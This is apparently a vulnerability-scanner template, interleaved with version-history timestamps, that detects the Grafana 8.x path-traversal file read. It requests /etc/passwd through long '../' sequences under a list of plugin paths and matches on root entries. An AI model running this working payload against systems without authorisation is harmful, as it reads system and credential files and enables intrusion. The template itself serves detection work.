2021-12-07 10:12:59 +00:00
id : grafana-file-read
info :
name : Grafana v8.x Arbitrary File Read
2021-12-08 06:39:12 +00:00
author : z0ne,dhiyaneshDk, jeya.seelan
2021-12-07 10:12:59 +00:00
severity : high
reference :
- https://nosec.org/home/detail/4914.html
- https://github.com/jas502n/Grafana-VulnTips
- https://twitter.com/pyn3rd/status/1468138032477859841
- https://twitter.com/naglinagli/status/1468155313182416899
tags : grafana,lfi
remediation : The latest Grafana unpatched 0 Day LFI is now being actively exploited, it affects only Grafana 8.0+, Vulnerable companies should revoke the secrets they store at their /etc/grafana/grafana.ini ASAP as there is no official fix in the meantime.
requests :
- method : GET
path :
- "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd"
payloads :
plugin-id :
- grafana-clock-panel
- alertlist
- graph
- elasticsearch
- dashlist
- cloudwatch
- mysql
- influxdb
- heatmap
- graphite
- prometheus
- postgres
- pluginlist
- opentsdb
- text
- table
- stackdriver
- grafana-azure-monitor-datasource
- grafana-simple-json-datasource
2021-12-08 06:39:12 +00:00
- annolist
- barchart
- bargauge
- candlestick
- gauge
- geomap
- gettingstarted
- histogram
- jaeger
- logs
- loki
- mssql
- news
- nodeGraph
- piechart
- stat
- state-timeline
- status-history
- tempo
- timeseries
- welcome
- zipkin
2021-12-07 10:12:59 +00:00
stop-at-first-match : true
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0"
- type : status
status :
2021-12-08 06:39:12 +00:00
- 200
